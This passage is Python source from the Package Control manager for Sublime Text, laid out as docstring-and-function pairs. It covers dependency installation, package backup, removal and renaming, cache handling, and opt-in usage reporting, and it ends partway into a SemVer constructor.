    Ensures a list of dependencies are installed and up-to-date

    :param dependencies:
        A list of dependency names

    :param fail_early:
        If True, return as soon as one dependency fails; otherwise attempt
        every dependency and report overall success at the end

    :return:
        A boolean indicating if the dependencies are properly installed
    """

    debug = self.settings.get('debug')
    packages = self.list_available_dependencies()
    error = False
    for dependency in dependencies:
        # The loader is managed by Package Control itself
        if (dependency == '0_package_control_loader'):
            continue
        dependency_dir = os.path.join(self.settings['packages_path'], dependency)
        dependency_git_dir = os.path.join(dependency_dir, '.git')
        dependency_hg_dir = os.path.join(dependency_dir, '.hg')
        dependency_metadata = self.get_metadata(dependency, is_dependency=True)
        dependency_releases = packages.get(dependency, {}).get('releases', [])
        dependency_release = (dependency_releases[0] if dependency_releases else {})
        installed_version = dependency_metadata.get('version')
        installed_version = (version_comparable(installed_version) if installed_version else None)
        available_version = dependency_release.get('version')
        available_version = (version_comparable(available_version) if available_version else None)

        def dependency_write(msg):
            # Prefix every status line with the dependency name and fill in
            # the version placeholders
            msg = (u"The dependency '{dependency}' " + msg)
            msg = msg.format(dependency=dependency, installed_version=installed_version, available_version=available_version)
            console_write(msg)

        def dependency_write_debug(msg):
            # Only emitted when the "debug" setting is enabled
            if debug:
                dependency_write(msg)

        # Decide whether this dependency needs to be (re)installed
        install_dependency = False
        if (not os.path.exists(dependency_dir)):
            install_dependency = True
            dependency_write(u'is not currently installed; installing...')
        elif os.path.exists(dependency_git_dir):
            dependency_write_debug(u'is installed via git; leaving alone')
        elif os.path.exists(dependency_hg_dir):
            dependency_write_debug(u'is installed via hg; leaving alone')
        elif (not dependency_metadata):
            dependency_write_debug(u'appears to be installed, but is missing metadata; leaving alone')
        elif (not dependency_releases):
            dependency_write(u'is installed, but there are no available releases; leaving alone')
        elif (not available_version):
            dependency_write(u'is installed, but the latest available release could not be determined; leaving alone')
        elif (not installed_version):
            install_dependency = True
            dependency_write(u'is installed, but its version is not known; upgrading to latest release {available_version}...')
        elif (installed_version < available_version):
            install_dependency = True
            dependency_write(u'is installed, but out of date; upgrading to latest release {available_version} from {installed_version}...')
        else:
            dependency_write_debug(u'is installed and up to date ({installed_version}); leaving alone')
        if install_dependency:
            dependency_result = self.install_package(dependency, True)
            if (not dependency_result):
                dependency_write(u'could not be installed or updated')
                if fail_early:
                    return False
                error = True
            else:
                dependency_write(u'has successfully been installed or updated')
    return (not error)
|
'Remove all not needed dependencies by the installed packages,
ignoring the specified package.
:param ignore_package:
The package to ignore when enumerating dependencies.
Not used when required_dependencies is provided.
:param required_dependencies:
All required dependencies, for speedup purposes.
:return:
Boolean indicating the success of the removals.'
def cleanup_dependencies(self, ignore_package=None, required_dependencies=None):
    """
    Remove all dependencies not needed by the installed packages,
    ignoring the specified package.

    :param ignore_package:
        The package to ignore when enumerating dependencies.
        Not used when required_dependencies is provided.

    :param required_dependencies:
        All required dependencies, for speedup purposes.

    :return:
        Boolean indicating the success of the removals.
    """

    installed = self.list_dependencies()
    if not required_dependencies:
        required_dependencies = self.find_required_dependencies(ignore_package)

    # Anything installed but not required is an orphan
    orphans = set(installed) - set(required_dependencies)

    success = True
    for dependency in sorted(orphans, key=lambda s: s.lower()):
        if not self.remove_package(dependency, is_dependency=True):
            success = False
            continue
        console_write(u'\n The orphaned dependency %s has been removed\n ', dependency)

    return success
|
'Does a full backup of the Packages/{package}/ dir to Backup/
:param package_name:
The name of the package to back up
:return:
If the backup succeeded'
def backup_package_dir(self, package_name):
    """
    Does a full backup of the Packages/{package}/ dir to Backup/

    :param package_name:
        The name of the package to back up

    :return:
        If the backup succeeded
    """

    package_dir = os.path.join(self.settings['packages_path'], package_name)
    if not os.path.exists(package_dir):
        return True

    # Initialized up front so the error path can test it directly instead
    # of relying on catching UnboundLocalError (the original approach)
    package_backup_dir = None
    try:
        backup_dir = os.path.join(
            os.path.dirname(self.settings['packages_path']),
            'Backup',
            datetime.datetime.now().strftime('%Y%m%d%H%M%S')
        )
        if not os.path.exists(backup_dir):
            os.makedirs(backup_dir)
        package_backup_dir = os.path.join(backup_dir, package_name)
        if os.path.exists(package_backup_dir):
            # copytree() will fail below; surface the cause to the console
            console_write(u'\n Backup folder "%s" already exists!\n ', package_backup_dir)
        shutil.copytree(package_dir, package_backup_dir)
        return True

    except (OSError, IOError) as e:
        show_error(u'\n An error occurred while trying to backup the package directory\n for %s.\n\n %s\n ', (package_name, unicode_from_os(e)))
        # Remove any partial backup so a retry starts clean
        if package_backup_dir and os.path.exists(package_backup_dir):
            delete_directory(package_backup_dir)
        return False
|
'Prints out package install and upgrade messages
The functionality provided by this allows package maintainers to
show messages to the user when a package is installed, or when
certain version upgrade occur.
:param package:
The name of the package the message is for
:param package_dir:
The full filesystem path to the package directory
:param is_upgrade:
If the install was actually an upgrade
:param old_version:
The string version of the package before the upgrade occurred
:param new_version:
The new (string) version of the package'
def print_messages(self, package, package_dir, is_upgrade, old_version, new_version):
    """
    Prints out package install and upgrade messages

    The functionality provided by this allows package maintainers to
    show messages to the user when a package is installed, or when
    certain version upgrades occur.

    :param package:
        The name of the package the message is for

    :param package_dir:
        The full filesystem path to the package directory

    :param is_upgrade:
        If the install was actually an upgrade

    :param old_version:
        The string version of the package before the upgrade occurred

    :param new_version:
        The new (string) version of the package
    """

    messages_file = os.path.join(package_dir, 'messages.json')
    if not os.path.exists(messages_file):
        return

    # Bug fix: the original opened the file and returned on a JSON parse
    # error before calling close(), leaking the file handle. The context
    # manager guarantees the handle is closed on every path.
    with open_compat(messages_file, 'r') as messages_fp:
        try:
            message_info = json.loads(read_compat(messages_fp))
        except ValueError:
            console_write(u'\n Error parsing messages.json for %s\n ', package)
            return

    def read_message(message_path):
        # Indents the message body under the package heading
        with open_compat(message_path, 'r') as f:
            return ('\n %s\n' % read_compat(f).rstrip().replace('\n', '\n '))

    output = ''
    if not is_upgrade and message_info.get('install'):
        try:
            install_file = message_info.get('install')
            install_path = os.path.join(package_dir, install_file)
            output += read_message(install_path)
        except FileNotFoundError:
            console_write(u'\n Error opening install message for %s from %s\n ', (package, install_file))

    elif is_upgrade and old_version:
        # Every key other than "install" is a version whose message should
        # be shown when upgrading across that version
        upgrade_messages = list(set(message_info.keys()) - set(['install']))
        upgrade_messages = version_sort(upgrade_messages, reverse=True)
        old_version_cmp = version_comparable(old_version)
        new_version_cmp = version_comparable(new_version)

        for version in upgrade_messages:
            version_cmp = version_comparable(version)
            # Sorted newest-first: everything from here down was already seen
            if version_cmp <= old_version_cmp:
                break
            # Skip messages for versions newer than the one just installed
            if version_cmp > new_version_cmp:
                continue
            try:
                upgrade_file = message_info.get(version)
                upgrade_path = os.path.join(package_dir, upgrade_file)
                output += read_message(upgrade_path)
            except FileNotFoundError:
                console_write(u'\n Error opening %s message for %s from %s\n ', (version, package, upgrade_file))

    if not output:
        return
    else:
        output = ('\n\n%s\n%s\n' % (package, '-' * len(package))) + output

    def print_to_panel():
        # Must run on the main UI thread (hence the set_timeout below)
        window = sublime.active_window()

        views = window.views()
        view = None
        for _view in views:
            if _view.name() == 'Package Control Messages':
                view = _view
                break

        if not view:
            view = window.new_file()
            view.set_name('Package Control Messages')
            view.set_scratch(True)
            view.settings().set('word_wrap', True)
            view.settings().set('auto_indent', False)
            view.settings().set('tab_width', 2)
        else:
            view.set_read_only(False)
            if window.active_view() != view:
                window.focus_view(view)

        def write(string):
            view.run_command('insert', {'characters': string})

        # Preserve the user's selection and scroll position across the write
        old_sel = list(view.sel())
        old_vpos = view.viewport_position()

        size = view.size()
        view.sel().clear()
        view.sel().add(sublime.Region(size, size))

        if not view.size():
            write(text.format(u'\n Package Control Messages\n ========================\n '))
        write(output)

        # Only move the final selection if it was already at the end
        if sublime.Region(size, size) == old_sel[-1]:
            old_sel[-1] = sublime.Region(view.size(), view.size())

        view.sel().clear()
        for reg in old_sel:
            view.sel().add(reg)

        view.set_viewport_position(old_vpos, False)
        view.set_read_only(True)

    sublime.set_timeout(print_to_panel, 1)
|
'Deletes a package
The deletion process consists of:
1. Deleting the directory (or marking it for deletion if deletion fails)
2. Submitting usage info
3. Removing the package from the list of installed packages
:param package_name:
The package to delete
:return: bool if the package was successfully deleted or None
if the package needs to be cleaned up on the next restart
and should not be reenabled'
def remove_package(self, package_name, is_dependency=False):
    """
    Deletes a package

    The deletion process consists of:

    1. Deleting the directory (or marking it for deletion if deletion fails)
    2. Submitting usage info
    3. Removing the package from the list of installed packages

    :param package_name:
        The package to delete

    :param is_dependency:
        If the package is a dependency

    :return:
        bool if the package was successfully deleted or None
        if the package needs to be cleaned up on the next restart
        and should not be reenabled
    """

    if (not is_dependency):
        installed_packages = self.list_packages()
    else:
        installed_packages = self.list_dependencies()

    package_type = 'package'
    if is_dependency:
        package_type = 'dependency'

    if (package_name not in installed_packages):
        show_error(u'\n The %s specified, %s, is not installed\n ', (package_type, package_name))
        return False

    # Move out of the package dir so it is not locked (relevant on Windows)
    os.chdir(self.settings['packages_path'])

    package_filename = (package_name + '.sublime-package')
    installed_package_path = os.path.join(self.settings['installed_packages_path'], package_filename)
    pristine_package_path = os.path.join(os.path.dirname(self.settings['packages_path']), 'Pristine Packages', package_filename)
    package_dir = self.get_package_dir(package_name)

    # Grab the version before the metadata file is deleted with the package
    version = self.get_metadata(package_name, is_dependency=is_dependency).get('version')

    cleanup_complete = True

    try:
        if os.path.exists(installed_package_path):
            os.remove(installed_package_path)
    except (OSError, IOError) as e:
        # The .sublime-package is likely in use; finish on next restart
        cleanup_complete = False

    try:
        if os.path.exists(pristine_package_path):
            os.remove(pristine_package_path)
    except (OSError, IOError) as e:
        show_error(u'\n An error occurred while trying to remove the pristine package\n file for %s.\n\n %s\n ', (package_name, unicode_from_os(e)))
        return False

    if os.path.exists(package_dir):
        can_delete_dir = True
        if (not clear_directory(package_dir)):
            # A file is in use - flag the dir for cleanup on next start
            open_compat(os.path.join(package_dir, 'package-control.cleanup'), 'w').close()
            cleanup_complete = False
            can_delete_dir = False

    params = {'package': package_name, 'operation': 'remove', 'version': version}
    self.record_usage(params)

    if (not is_dependency):
        def save_names():
            # Settings must be manipulated on the main thread
            settings = sublime.load_settings(pc_settings_filename())
            original_names = load_list_setting(settings, 'installed_packages')
            names = list(original_names)
            if (package_name in names):
                names.remove(package_name)
            save_list_setting(settings, pc_settings_filename(), 'installed_packages', names, original_names)
        sublime.set_timeout(save_names, 1)

    # NOTE: can_delete_dir is only bound when package_dir exists; the
    # short-circuit on os.path.exists() prevents a NameError otherwise
    if (os.path.exists(package_dir) and can_delete_dir):
        os.rmdir(package_dir)

    if is_dependency:
        loader.remove(package_name)
    else:
        message = (u'The package %s has been removed' % package_name)
        if (not cleanup_complete):
            message += u' and will be cleaned up on the next restart'
        console_write(message)
        # Drop any dependencies no longer needed by the remaining packages
        self.cleanup_dependencies(package_name)

    return (True if cleanup_complete else None)
|
'Submits install, upgrade and delete actions to a usage server
The usage information is currently displayed on the Package Control
website at https://packagecontrol.io
:param params:
A dict of the information to submit'
def record_usage(self, params):
    """
    Submits install, upgrade and delete actions to a usage server

    The usage information is currently displayed on the Package Control
    website at https://packagecontrol.io

    :param params:
        A dict of the information to submit
    """

    if not self.settings.get('submit_usage'):
        return

    params['package_control_version'] = self.get_metadata('Package Control').get('version')
    params['sublime_platform'] = self.settings.get('platform')
    params['sublime_version'] = self.settings.get('version')

    # urlencode() needs byte strings under Python 2
    for name in params:
        value = params[name]
        if isinstance(value, str_cls):
            params[name] = value.encode('utf-8')

    url = self.settings.get('submit_url') + '?' + urlencode(params)

    try:
        with downloader(url, self.settings) as manager:
            result = manager.fetch(url, 'Error submitting usage information.')
    except DownloaderException as e:
        console_write(e)
        return

    try:
        response = json.loads(result.decode('utf-8'))
        if response['result'] != 'success':
            raise ValueError()
    except ValueError:
        console_write(u'\n Error submitting usage information for %s\n ', params['package'])
|
'Removes all cache entries older than the TTL
:param ttl:
The number of seconds a cache entry should be valid for'
def clear(self, ttl):
    """
    Removes all cache entries older than the TTL

    :param ttl:
        The number of seconds a cache entry should be valid for
    """

    ttl = int(ttl)
    # Compute the cutoff once so every entry is judged against the same
    # instant, instead of calling time.time() per file inside the loop
    cutoff = time.time() - ttl
    for filename in os.listdir(self.base_path):
        path = os.path.join(self.base_path, filename)
        # Only files are cache entries; skip any directories
        if os.path.isdir(path):
            continue
        if os.stat(path).st_mtime < cutoff:
            os.unlink(path)
|
'Returns a cached value
:param key:
The key to fetch the cache for
:return:
The (binary) cached value, or False'
def get(self, key):
    """
    Returns a cached value

    :param key:
        The key to fetch the cache for

    :return:
        The (binary) cached value, or False
    """

    cache_file = os.path.join(self.base_path, key)
    if os.path.exists(cache_file):
        with open_compat(cache_file, 'rb') as f:
            return read_compat(f)
    return False
|
'Returns the filesystem path to the key
:param key:
The key to get the path for
:return:
The absolute filesystem path to the cache file'
def path(self, key):
    """
    Returns the filesystem path to the key

    :param key:
        The key to get the path for

    :return:
        The absolute filesystem path to the cache file
    """

    return os.path.join(self.base_path, key)
|
'Saves a value in the cache
:param key:
The key to save the cache with
:param content:
The (binary) content to cache'
def set(self, key, content):
    """
    Saves a value in the cache

    :param key:
        The key to save the cache with

    :param content:
        The (binary) content to cache
    """

    with open_compat(os.path.join(self.base_path, key), 'wb') as f:
        f.write(content)
|
'Loads the list of installed packages'
def load_settings(self):
    """
    Loads the list of installed packages from the
    Package Control.sublime-settings file
    """

    settings = sublime.load_settings(pc_settings_filename())
    # Kept as the baseline for later save_list_setting() comparisons
    self.original_installed_packages = load_list_setting(settings, 'installed_packages')
|
'Renames any installed packages that the user has installed.
:param installer:
An instance of :class:`PackageInstaller`'
def rename_packages(self, installer):
    """
    Renames any installed packages that the user has installed.

    :param installer:
        An instance of :class:`PackageInstaller`
    """

    # Fetching the available packages also populates the renamed_packages
    # setting from the channel
    installer.manager.list_available_packages()
    renamed_packages = installer.manager.settings.get('renamed_packages', {})
    if (not renamed_packages):
        renamed_packages = {}

    installed_packages = list(self.original_installed_packages)
    present_packages = installer.manager.list_packages()

    # On these platforms a case-only rename needs special handling
    case_insensitive_fs = (sublime.platform() in ['windows', 'osx'])

    for (package_name, new_package_name) in renamed_packages.items():
        changing_case = (package_name.lower() == new_package_name.lower())
        # Nothing to do if the old-cased name is not actually present
        if (case_insensitive_fs and changing_case and (package_name not in present_packages)):
            continue

        package_file = os.path.join(sublime.installed_packages_path(), (package_name + '.sublime-package'))
        package_dir = os.path.join(sublime.packages_path(), package_name)

        # Work out whether the package exists as a .sublime-package file
        # or as an unpacked, Package Control-managed directory
        if os.path.exists(package_file):
            new_package_path = os.path.join(sublime.installed_packages_path(), (new_package_name + '.sublime-package'))
            package_path = package_file
        elif os.path.exists(os.path.join(package_dir, 'package-metadata.json')):
            new_package_path = os.path.join(sublime.packages_path(), new_package_name)
            package_path = package_dir
        else:
            continue

        # Disable the old name so Sublime Text releases any file locks
        sublime.set_timeout(partial(self.disable_packages, package_name, 'remove'), 10)
        remove_result = True

        if ((not os.path.exists(new_package_path)) or (case_insensitive_fs and changing_case)):
            sublime.set_timeout(partial(self.disable_packages, new_package_name, 'install'), 10)
            # Give Sublime Text time to process the ignore before renaming
            time.sleep(0.7)

            # A case-only rename on Windows needs a two-step move through
            # a temp name outside of the Packages dir
            if ((os.name == 'nt') and changing_case):
                temp_package_name = ('__' + new_package_name)
                temp_package_path = os.path.join(os.path.dirname(sublime.packages_path()), temp_package_name)
                os.rename(package_path, temp_package_path)
                package_path = temp_package_path

            os.rename(package_path, new_package_path)
            installed_packages.append(new_package_name)
            console_write(u'\n Renamed %s to %s\n ', (package_name, new_package_name))
            sublime.set_timeout(partial(self.reenable_package, new_package_name, 'install'), 700)
        else:
            # The new name already exists, so just drop the old package
            time.sleep(0.7)
            remove_result = installer.manager.remove_package(package_name)
            console_write(u'\n Removed %s since package with new name (%s) already exists\n ', (package_name, new_package_name))

        # remove_package() returns None when cleanup happens on next
        # restart, in which case the old name must stay disabled
        if (remove_result is not None):
            sublime.set_timeout(partial(self.reenable_package, package_name, 'remove'), 700)

        try:
            installed_packages.remove(package_name)
        except ValueError:
            pass

    sublime.set_timeout((lambda : self.save_packages(installed_packages)), 10)
|
'Saves the list of installed packages (after having been appropriately
renamed)
:param installed_packages:
The new list of installed packages'
def save_packages(self, installed_packages):
    """
    Saves the list of installed packages (after having been appropriately
    renamed)

    :param installed_packages:
        The new list of installed packages
    """

    filename = pc_settings_filename()
    settings = sublime.load_settings(filename)
    # Only persists when the list differs from the originally loaded value
    save_list_setting(settings, filename, 'installed_packages', installed_packages, self.original_installed_packages)
|
'On Windows, .sublime-package files are locked when imported, so we must
disable the package, delete it and then re-enable the package.
:param name:
The name of the package
:param filename:
The filename of the package'
def remove_package_file(self, name, filename):
    """
    On Windows, .sublime-package files are locked when imported, so we must
    disable the package, delete it and then re-enable the package.

    :param name:
        The name of the package

    :param filename:
        The filename of the package
    """

    def do_remove():
        try:
            os.remove(filename)
            console_write(u'\n Removed orphaned package %s\n ', name)
        except OSError as e:
            console_write(u'\n Unable to remove orphaned package %s - deferring until\n next start: %s\n ', (name, unicode_from_os(e)))
        finally:
            # Always re-enable the package, even when deletion failed
            pref_filename = preferences_filename()
            settings = sublime.load_settings(pref_filename)
            ignored = load_list_setting(settings, 'ignored_packages')
            new_ignored = list(ignored)
            try:
                new_ignored.remove(name)
            except ValueError:
                pass
            save_list_setting(settings, pref_filename, 'ignored_packages', new_ignored, ignored)

    # Disable the package first so Sublime Text releases its lock
    pref_filename = preferences_filename()
    settings = sublime.load_settings(pref_filename)
    ignored = load_list_setting(settings, 'ignored_packages')
    new_ignored = list(ignored)
    new_ignored.append(name)
    save_list_setting(settings, pref_filename, 'ignored_packages', new_ignored, ignored)

    # Give Sublime Text time to act on the ignore before removing the file
    sublime.set_timeout(do_remove, 700)
|
'Detects if a package is compatible with the current Sublime Text install
:param metadata:
A dict from a metadata file
:return:
If the package is compatible'
def is_compatible(self, metadata):
    """
    Detects if a package is compatible with the current Sublime Text install

    :param metadata:
        A dict from a metadata file

    :return:
        If the package is compatible
    """

    sublime_text = metadata.get('sublime_text')
    platforms = metadata.get('platforms', [])

    # No requirements recorded means the package works everywhere
    if not sublime_text and not platforms:
        return True

    if not is_compatible_version(sublime_text):
        return False

    if not isinstance(platforms, list):
        platforms = [platforms]

    # From most to least specific: "os-arch", "os", then the wildcard
    selectors = [
        sublime.platform() + '-' + sublime.arch(),
        sublime.platform(),
        '*',
    ]
    return any(selector in platforms for selector in selectors)
|
'A callback that can be run the main UI thread to perform saving of the
Package Control.sublime-settings file. Also fires off the
:class:`AutomaticUpgrader`.
:param installed_packages:
A list of the string package names of all "installed" packages,
even ones that do not appear to be in the filesystem.
:param found_packages:
A list of the string package names of all packages that are
currently installed on the filesystem.
:param found_dependencies:
A list of the string package names of all dependencies that are
currently installed on the filesystem.'
def finish(self, installed_packages, found_packages, found_dependencies):
    """
    A callback that can be run the main UI thread to perform saving of the
    Package Control.sublime-settings file. Also fires off the
    :class:`AutomaticUpgrader`.

    :param installed_packages:
        A list of the string package names of all "installed" packages,
        even ones that do not appear to be in the filesystem.

    :param found_packages:
        A list of the string package names of all packages that are
        currently installed on the filesystem.

    :param found_dependencies:
        A list of the string package names of all dependencies that are
        currently installed on the filesystem.
    """

    pc_filename = pc_settings_filename()
    pc_settings = sublime.load_settings(pc_filename)

    # Packages left in in_process_packages were disabled by an operation
    # that never completed (e.g. Sublime Text was closed mid-upgrade)
    in_process = load_list_setting(pc_settings, 'in_process_packages')
    if in_process:
        filename = preferences_filename()
        settings = sublime.load_settings(filename)
        ignored = load_list_setting(settings, 'ignored_packages')
        new_ignored = list(ignored)
        for package in in_process:
            if (package in new_ignored):
                # The loader stays disabled while it is being swapped out
                if ((loader.loader_package_name == package) and loader.is_swapping()):
                    continue
                console_write(u'\n The package %s is being re-enabled after a Package\n Control operation was interrupted\n ', package)
                new_ignored.remove(package)
        save_list_setting(settings, filename, 'ignored_packages', new_ignored, ignored)
        save_list_setting(pc_settings, pc_filename, 'in_process_packages', [])

    save_list_setting(pc_settings, pc_filename, 'installed_packages', installed_packages, self.original_installed_packages)
    AutomaticUpgrader(found_packages, found_dependencies).start()
|
'Gets the current version of a package
:param package:
The name of the package
:return:
The string version'
def get_version(self, package):
    """
    Gets the current version of a package

    :param package:
        The name of the package

    :return:
        The string version
    """

    fallback = 'unknown version'

    if not package_file_exists(package, 'package-metadata.json'):
        return fallback

    metadata_json = read_package_file(package, 'package-metadata.json')
    if not metadata_json:
        return fallback

    try:
        return json.loads(metadata_json).get('version', fallback)
    except ValueError:
        # Corrupt metadata file
        return fallback
|
'Disables one or more packages before installing or upgrading to prevent
errors where Sublime Text tries to read files that no longer exist, or
read a half-written file.
:param packages:
The string package name, or an array of strings
:param type:
The type of operation that caused the package to be disabled:
- "upgrade"
- "remove"
- "install"
- "disable"
- "loader"
:return:
A list of package names that were disabled'
def disable_packages(self, packages, type='upgrade'):
    """
    Disables one or more packages before installing or upgrading to prevent
    errors where Sublime Text tries to read files that no longer exist, or
    read a half-written file.

    :param packages:
        The string package name, or an array of strings

    :param type:
        The type of operation that caused the package to be disabled:
         - "upgrade"
         - "remove"
         - "install"
         - "disable"
         - "loader"

    :return:
        A list of package names that were disabled
    """

    global events
    if (events is None):
        # Imported lazily to avoid a circular import at module load time
        from package_control import events

    if (not isinstance(packages, list)):
        packages = [packages]

    disabled = []

    settings = sublime.load_settings(preferences_filename())
    ignored = load_list_setting(settings, 'ignored_packages')

    pc_settings = sublime.load_settings(pc_settings_filename())
    in_process = load_list_setting(pc_settings, 'in_process_packages')

    # Reset the record of settings to restore once the operation completes
    # (consumed by reenable_package())
    PackageDisabler.old_color_scheme_package = None
    PackageDisabler.old_color_scheme = None
    PackageDisabler.old_theme_package = None
    PackageDisabler.old_theme = None
    PackageDisabler.old_syntaxes = {}
    PackageDisabler.old_color_schemes = {}

    for package in packages:
        if (package not in ignored):
            in_process.append(package)
            ignored.append(package)
            disabled.append(package)

        if (type in ['upgrade', 'remove']):
            version = self.get_version(package)
            tracker_type = ('pre_upgrade' if (type == 'upgrade') else type)
            events.add(tracker_type, package, version)

        # Swap defaults in for any settings pointing into this package so
        # Sublime Text does not try to load files that are about to vanish
        global_color_scheme = settings.get('color_scheme')
        if ((global_color_scheme is not None) and (global_color_scheme.find((('Packages/' + package) + '/')) != (-1))):
            PackageDisabler.old_color_scheme_package = package
            PackageDisabler.old_color_scheme = global_color_scheme
            settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')

        for window in sublime.windows():
            for view in window.views():
                view_settings = view.settings()
                syntax = view_settings.get('syntax')
                if ((syntax is not None) and (syntax.find((('Packages/' + package) + '/')) != (-1))):
                    if (package not in PackageDisabler.old_syntaxes):
                        PackageDisabler.old_syntaxes[package] = []
                    PackageDisabler.old_syntaxes[package].append([view, syntax])
                    view_settings.set('syntax', 'Packages/Text/Plain text.tmLanguage')
                # View-specific color schemes that differ from the global one
                scheme = view_settings.get('color_scheme')
                if ((scheme is not None) and (scheme != global_color_scheme) and (scheme.find((('Packages/' + package) + '/')) != (-1))):
                    if (package not in PackageDisabler.old_color_schemes):
                        PackageDisabler.old_color_schemes[package] = []
                    PackageDisabler.old_color_schemes[package].append([view, scheme])
                    view_settings.set('color_scheme', 'Packages/Color Scheme - Default/Monokai.tmTheme')

        if package_file_exists(package, settings.get('theme')):
            PackageDisabler.old_theme_package = package
            PackageDisabler.old_theme = settings.get('theme')
            settings.set('theme', 'Default.sublime-theme')

    # "disable" operations are user-initiated and tracked separately, so
    # no in-process state is recorded for them
    if (type != 'disable'):
        save_list_setting(pc_settings, pc_settings_filename(), 'in_process_packages', in_process)
    save_list_setting(settings, preferences_filename(), 'ignored_packages', ignored)

    return disabled
|
'Re-enables a package after it has been installed or upgraded
:param package:
The string package name
:param type:
The type of operation that caused the package to be re-enabled:
- "upgrade"
- "remove"
- "install"
- "enable"
- "loader"'
def reenable_package(self, package, type='upgrade'):
    """
    Re-enables a package after it has been installed or upgraded

    :param package:
        The string package name

    :param type:
        The type of operation that caused the package to be re-enabled:
         - "upgrade"
         - "remove"
         - "install"
         - "enable"
         - "loader"
    """

    global events
    if (events is None):
        # Imported lazily to avoid a circular import at module load time
        from package_control import events

    settings = sublime.load_settings(preferences_filename())
    ignored = load_list_setting(settings, 'ignored_packages')

    if (package in ignored):
        if (type in ['install', 'upgrade']):
            version = self.get_version(package)
            tracker_type = ('post_upgrade' if (type == 'upgrade') else type)
            events.add(tracker_type, package, version)
            events.clear(tracker_type, package, future=True)
            if (type == 'upgrade'):
                events.clear('pre_upgrade', package)
        elif (type == 'remove'):
            events.clear('remove', package)

        ignored = list((set(ignored) - set([package])))
        save_list_setting(settings, preferences_filename(), 'ignored_packages', ignored)

        corruption_notice = u' You may see some graphical corruption until you restart Sublime Text.'

        # The package providing the active theme was removed; the Default
        # theme was already substituted by disable_packages()
        if ((type == 'remove') and (PackageDisabler.old_theme_package == package)):
            message = text.format(u'\n Package Control\n\n The package containing your active theme was just removed\n and the Default theme was enabled in its place.\n ')
            if (int(sublime.version()) < 3106):
                message += corruption_notice
            sublime.message_dialog(message)

        def delayed_settings_restore():
            # Restores the syntax/color scheme/theme values swapped to
            # defaults by disable_packages(), once the upgraded files
            # exist on disk again
            syntax_errors = set()
            color_scheme_errors = set()

            if (PackageDisabler.old_syntaxes is None):
                PackageDisabler.old_syntaxes = {}
            if (PackageDisabler.old_color_schemes is None):
                PackageDisabler.old_color_schemes = {}

            if ((type == 'upgrade') and (package in PackageDisabler.old_syntaxes)):
                for view_syntax in PackageDisabler.old_syntaxes[package]:
                    (view, syntax) = view_syntax
                    if resource_exists(syntax):
                        view.settings().set('syntax', syntax)
                    elif (syntax not in syntax_errors):
                        # Only warn once per missing syntax file
                        console_write((u'The syntax "%s" no longer exists' % syntax))
                        syntax_errors.add(syntax)

            if ((type == 'upgrade') and (PackageDisabler.old_color_scheme_package == package)):
                if resource_exists(PackageDisabler.old_color_scheme):
                    settings.set('color_scheme', PackageDisabler.old_color_scheme)
                else:
                    color_scheme_errors.add(PackageDisabler.old_color_scheme)
                    sublime.error_message(text.format(u'\n Package Control\n\n The package containing your active color scheme was\n just upgraded, however the .tmTheme file no longer\n exists. Sublime Text has been configured use the\n default color scheme instead.\n '))

            if ((type == 'upgrade') and (package in PackageDisabler.old_color_schemes)):
                for view_scheme in PackageDisabler.old_color_schemes[package]:
                    (view, scheme) = view_scheme
                    if resource_exists(scheme):
                        view.settings().set('color_scheme', scheme)
                    elif (scheme not in color_scheme_errors):
                        console_write((u'The color scheme "%s" no longer exists' % scheme))
                        color_scheme_errors.add(scheme)

            if ((type == 'upgrade') and (PackageDisabler.old_theme_package == package)):
                if package_file_exists(package, PackageDisabler.old_theme):
                    settings.set('theme', PackageDisabler.old_theme)
                    message = text.format(u'\n Package Control\n\n The package containing your active theme was just\n upgraded.\n ')
                    if (int(sublime.version()) < 3106):
                        message += corruption_notice
                    sublime.message_dialog(message)
                else:
                    sublime.error_message(text.format(u'\n Package Control\n\n The package containing your active theme was just\n upgraded, however the .sublime-theme file no longer\n exists. Sublime Text has been configured use the\n default theme instead.\n '))

            sublime.save_settings(preferences_filename())

        # Wait for the package files to be fully written to disk
        sublime.set_timeout(delayed_settings_restore, 1000)

    pc_settings = sublime.load_settings(pc_settings_filename())
    in_process = load_list_setting(pc_settings, 'in_process_packages')
    if (package in in_process):
        in_process.remove(package)
        save_list_setting(pc_settings, pc_settings_filename(), 'in_process_packages', in_process)
|
'There are two different constructor styles that are allowed:
- Option 1 allows specification of a semantic version as a string and the option to "clean"
the string before parsing it.
- Option 2 allows specification of each component separately as one parameter.
Note that all the parameters specified in the following sections can be passed either as
positional or as named parameters while considering the usual Python rules for this. As
such, `SemVer(1, 2, minor=1)` will result in an exception and not in `SemVer("1.1.2")`.
Option 1:
Constructor examples:
SemVer("1.0.1")
SemVer("this version 1.0.1-pre.1 here", True)
SemVer(ver="0.0.9-pre-alpha+34", clean=False)
Parameters:
* ver (str)
The string containing the version.
* clean = `False` (bool; optional)
If this is true in boolean context, `SemVer.clean(ver)` is called before
parsing.
Option 2:
Constructor examples:
SemVer(1, 0, 1)
SemVer(1, \'0\', prerelease=\'pre-alpha\', patch=1, build=34)
SemVer(**dict(minor=2, major=1, patch=3))
Parameters:
* major (int, str, float ...)
* minor (...)
* patch (...)
Major to patch components must be an integer or convertable to an int (e.g. a
string or another number type).
* prerelease = `None` (str, int, float ...; optional)
* build = `None` (...; optional)
Pre-release and build components should be a string (or number) type.
Will be passed to `str()` if not already a string but the final string must
match \'^[0-9A-Za-z.-]*$\'
Raises:
* TypeError
Invalid parameter type(s) or combination (e.g. option 1 and 2).
* ValueError
Invalid semantic version or option 2 parameters unconvertable.'
def __new__(cls, *args, **kwargs):
    """
    Create a SemVer from either a version string or separate components.

    Option 1 - a version string (with optional cleaning):
        SemVer("1.0.1")
        SemVer("this version 1.0.1-pre.1 here", True)
        SemVer(ver="0.0.9-pre-alpha+34", clean=False)

    Option 2 - separate components:
        SemVer(1, 0, 1)
        SemVer(1, '0', prerelease='pre-alpha', patch=1, build=34)
        SemVer(**dict(minor=2, major=1, patch=3))

    Major, minor and patch must be ints (or convertable to int); prerelease
    and build are optional strings (or stringified values) that must match
    '^[0-9A-Za-z.-]*$'. Options 1 and 2 may not be mixed.

    Raises:
        * TypeError
            Invalid parameter type(s) or combination (e.g. option 1 and 2).
        * ValueError
            Invalid semantic version or option 2 parameters unconvertable.
    """

    (ver, clean, comps) = (None, False, None)
    # l = total argument count; used to decide which option was intended
    (kw, l) = (kwargs.copy(), (len(args) + len(kwargs)))

    def inv():
        raise TypeError(('Invalid parameter combination: args=%s; kwargs=%s' % (args, kwargs)))

    if ((l == 0) or (l > 5)):
